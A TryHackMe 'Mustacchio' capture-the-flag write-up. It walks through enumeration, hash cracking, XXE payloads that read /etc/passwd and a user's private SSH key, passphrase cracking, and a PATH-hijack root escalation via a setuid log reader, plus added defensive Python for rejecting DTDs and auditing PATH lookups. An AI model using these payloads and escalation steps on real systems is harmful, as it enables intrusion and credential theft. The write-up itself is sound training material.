Mustacchio — TryHackMe
Easy boot2root Machine

Summary
Another easy boot2root room. We first needed to enumerate a bit to find out what is running, then directory brute-forcing turned up a sqlite3 database dump, which gave us the admin password. Using that password we logged in to the admin portal, where an XXE vulnerability was exploited to read the user’s encrypted SSH key, which was then cracked with ssh2john. Privesc involved exploiting a suid binary.
This room is available here: https://tryhackme.com/room/mustacchio
So as usual let’s start enumerating the machine with nmap:
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.202.187
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8765/tcp open ultraseek-https
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,8765 10.10.202.187
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 58:1b:0c:0f:fa:cf:05:be:4c:c0:7a:f1:f1:88:61:1c (RSA)
| 256 3c:fc:e8:a3:7e:03:9a:30:2c:77:e0:0a:1c:e4:52:e6 (ECDSA)
|_ 256 9d:59:c6:c7:79:c5:54:c4:1d:aa:e4:d1:84:71:01:92 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Mustacchio | Home
8765/tcp open http nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Mustacchio | Login
So, we have SSH port open and 2 web server ports open. Let’s use FFUF to check if any useful directory is exposed:
FFUF
# Perform directory brute forcing using ffuf
⇒ ffuf -u http://10.10.202.187/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c
ffuf v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.202.187/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

custom                  [Status: 301, Size: 315, Words: 20, Lines: 10]
images                  [Status: 301, Size: 315, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 314, Words: 20, Lines: 10]
                        [Status: 200, Size: 1752, Words: 77, Lines: 73]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [220546/220546] :: Job [1/1] :: 1957 req/sec :: Duration: [0:02:17] :: Errors: 0 ::
We can see a directory called “custom” is there. Let’s explore it:

Users.bak
Users.bak looks to be a database dump:

Exploring it with sqlitebrowser gives us a user ‘admin’ and a hashed password:

The hash is easily cracked at https://crackstation.net/ :

Admin Portal
There was one more web port open, which nmap had told us about earlier. Accessing it on port 8765 gives us an admin login portal:

Using the admin username and password found above, we are able to log in. Just clicking the submit button gives us a pop-up: Insert XML code!

Also capture this request in Burp Suite:

A few things are revealed here:
- xml as a parameter, indicating that XML is expected as input
- The code that explains why we got the pop-up
- Possibly an example XML at http://10.10.215.141:8765/auth/dontforget.bak
- A user Barry, who has an SSH key
Checking auth/dontforget.bak indeed gave us an example XML request:
kali@kali:~$ cat /tmp/dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space....</com>
</comment>
From this it is pretty clear that we have an XXE vulnerability here, and we need to exploit it to get our first flag.
XXE Payload
Found some useful XXE payloads here:
Combining the XML request with those payloads, here is a PoC that gave us the password file:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>

So we can use this PoC to read user Barry’s private SSH key:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///home/barry/.ssh/id_rsa"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>
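Both payloads above work because the portal's parser honours the DTD that the submitted document carries. The fix on the server side is to refuse DTDs outright. The following is an added example, not code from the room or the portal: a hardened parser for the `<comment>` documents the portal accepts (the shape of dontforget.bak). A handler-only expat pass records any DOCTYPE or ENTITY declaration without fetching anything, the document is rejected if one is present, and the actual parse uses xml.etree, which does not resolve external entities either. The two sample documents are constructed from the request and payload shown above.

```python
"""
Added example (not the room's or the portal's code): reject DTDs, then
parse the <comment> document with an entity-blind parser.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXMLError(ValueError):
    """Raised for documents that declare a DTD or entities, or fail to parse."""


def dtd_markers(data: bytes) -> list[str]:
    """List the DTD constructs in `data` using a handler-only expat pass.

    No ExternalEntityRefHandler is installed, so expat only reports the
    declarations it sees; it never fetches file:// or http:// targets.
    """
    seen: list[str] = []
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        seen.append(f"DOCTYPE {name}")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        kind = "external" if (sysid or pubid) else "internal"
        seen.append(f"ENTITY {name} ({kind})")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # malformed input is reported by the real parse in parse_comment
    return seen


def parse_comment(data: bytes) -> dict[str, str]:
    """Parse a <comment> document into name/author/com, refusing any DTD."""
    markers = dtd_markers(data)
    if markers:
        raise UnsafeXMLError("DTD not allowed: " + ", ".join(markers))
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        raise UnsafeXMLError(f"rejected: {exc}") from exc
    if root.tag != "comment":
        raise UnsafeXMLError(f"unexpected root element <{root.tag}>")
    return {tag: (root.findtext(tag) or "") for tag in ("name", "author", "com")}


def is_rejected(data: bytes) -> bool:
    """True if parse_comment refuses `data` (used by the demo below)."""
    try:
        parse_comment(data)
    except UnsafeXMLError:
        return True
    return False


# Constructed samples: the benign request from dontforget.bak and the
# external-entity payload shape that was sent to the portal.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space....</com>
</comment>"""

XXE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<comment>
<name>&ent;</name>
<author>Barry Clad</author>
<com>Hiiii</com>
</comment>"""

if __name__ == "__main__":
    print("benign  ->", parse_comment(BENIGN))
    print("payload ->", dtd_markers(XXE), "rejected:", is_rejected(XXE))
```

Rejecting the DTD wholesale is the simplest durable rule: a comment form has no legitimate use for one, and it closes the door on internal entity expansion as well as on external entities. The `dtd_markers` list is also a useful value to log from the application, since a DOCTYPE in a form submission is a clear detection signal on its own.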
We got the private key for user Barry, but the key is encrypted. Let’s use ssh2john and john to crack its passphrase:
python /opt/tools/ssh2john.py id_rsa > id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash

User Flag
So we now have the SSH key for user Barry along with the passphrase for that key. Change the permissions on the key file to 600 and then log in using the following command:

User.txt was in user Barry’s home directory:

Privilege Escalation
Running the Linux Smart Enumeration script, we found an uncommon setuid binary:

This is the binary with the setuid bit set, and it is owned by root:

Let’s analyze this binary using strings:

This binary looks to be an Nginx log reader. It uses the tail command to read access.log, but without the full path. We can exploit that by placing our own “tail” binary earlier in the search path and using it for privilege escalation. First we need to change the PATH variable so that our binary is found first:
barry@mustacchio:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:~$ PATH=/home/barry:$PATH
barry@mustacchio:~$ echo $PATH
/home/barry:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
Then let’s create a new file in /home/barry named tail:
barry@mustacchio:~$ cat tail
/bin/bash
barry@mustacchio:~$ chmod +x tail
barry@mustacchio:~$
Now execute the suid binary /home/joe/live_log:

/bin/bash was executed as root, giving us a root shell and then the root flag. Game over!
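The whole escalation rests on one property: a setuid program that names `tail` by a bare word lets the shell resolve it through a PATH the caller controls. The following is an added example, not part of the room, that audits that lookup the way an `sh`/`execvp` resolution would: given the command line a privileged program hands to the shell, the PATH it would inherit, and stat-style owner/mode data for the directories on that PATH, it reports which file the lookup resolves to, which earlier directories the invoking user can write to, and whether the resolved file is root-owned. The filesystem view, the uid/gid values and the `tail -f /var/log/nginx/access.log` command line are constructed for the demo (the writeup does not show live_log's exact invocation); the PATH strings are the ones printed above.

```python
"""
Added example (not the room's code): model the PATH lookup behind the
live_log escalation and flag where a non-root user could hijack it.
"""
from __future__ import annotations

import shlex
import stat
from dataclasses import dataclass


@dataclass(frozen=True)
class Node:
    """The subset of os.stat_result that a write-permission check needs."""
    mode: int
    uid: int
    gid: int


def writable_by(node: Node, uid: int, gids: set[int]) -> bool:
    """Unix DAC write check: root always, then owner, group, other in order."""
    if uid == 0:
        return True
    if node.uid == uid:
        return bool(node.mode & stat.S_IWUSR)
    if node.gid in gids:
        return bool(node.mode & stat.S_IWGRP)
    return bool(node.mode & stat.S_IWOTH)


def command_word(cmdline: str) -> str:
    """Program word of a system()-style command line ('tail' from 'tail -f x')."""
    return shlex.split(cmdline)[0]


def audit_lookup(cmdline: str, path: str, dirs: dict[str, Node],
                 files: dict[str, Node], uid: int, gids: set[int]) -> dict:
    """Resolve the program as the shell would and record the hijack points.

    Returns the resolved file (None if absent), the PATH directories searched
    before it that `uid` can write to, and whether the resolved file itself
    is owned by someone other than root.
    """
    word = command_word(cmdline)
    if word.startswith("/"):
        # An absolute path never consults PATH, so no directory can shadow it.
        node = files.get(word)
        return {"resolved": word if node else None, "writable_before": [],
                "resolved_not_root_owned": bool(node and node.uid != 0)}
    writable_before: list[str] = []
    for d in path.split(":"):
        if not d:
            continue  # an empty element means the cwd; not modelled here
        candidate = d.rstrip("/") + "/" + word
        if candidate in files:
            return {"resolved": candidate, "writable_before": writable_before,
                    "resolved_not_root_owned": files[candidate].uid != 0}
        if d in dirs and writable_by(dirs[d], uid, gids):
            writable_before.append(d)
    return {"resolved": None, "writable_before": writable_before,
            "resolved_not_root_owned": False}


def hijackable(report: dict) -> bool:
    """True if a lower-privileged user can make the lookup run their own file."""
    return bool(report["writable_before"]) or bool(report["resolved_not_root_owned"])


# Constructed view of the target: barry's home plus the standard system
# directories, with the real tail modelled at /usr/bin/tail.
ROOT_DIR = Node(mode=0o755, uid=0, gid=0)
DIRS = {"/home/barry": Node(mode=0o755, uid=1000, gid=1000)}
DIRS.update({d: ROOT_DIR for d in ("/usr/local/sbin", "/usr/local/bin",
                                   "/usr/sbin", "/usr/bin", "/sbin", "/bin")})
FILES = {"/usr/bin/tail": Node(mode=0o755, uid=0, gid=0)}
PLANTED = {**FILES, "/home/barry/tail": Node(mode=0o755, uid=1000, gid=1000)}
DEFAULT_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
BARRY_PATH = "/home/barry:" + DEFAULT_PATH
LIVE_LOG_CMD = "tail -f /var/log/nginx/access.log"  # assumed shape of the call
BARRY_UID, BARRY_GIDS = 1000, {1000}                 # constructed ids

if __name__ == "__main__":
    scenarios = [
        ("default PATH", DEFAULT_PATH, FILES, LIVE_LOG_CMD),
        ("caller-prepended PATH", BARRY_PATH, FILES, LIVE_LOG_CMD),
        ("caller-prepended PATH, tail planted", BARRY_PATH, PLANTED, LIVE_LOG_CMD),
        ("absolute path in the binary", BARRY_PATH, PLANTED,
         "/usr/bin/tail -f /var/log/nginx/access.log"),
    ]
    for label, path, files, cmd in scenarios:
        report = audit_lookup(cmd, path, DIRS, files, BARRY_UID, BARRY_GIDS)
        print(f"{label}: hijackable={hijackable(report)} {report}")
```

The "default PATH" scenario is the trap: audited against the PATH an administrator expects, the lookup looks safe, but a setuid program inherits whatever PATH its caller exported, so only the absolute-path scenario is actually robust. The corresponding fixes in the binary are to invoke tail by its full path or to set PATH to a fixed value itself, and to avoid running the reader with elevated privileges at all where group-readable logs would do.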
That’s it for this room. Thanks for reading.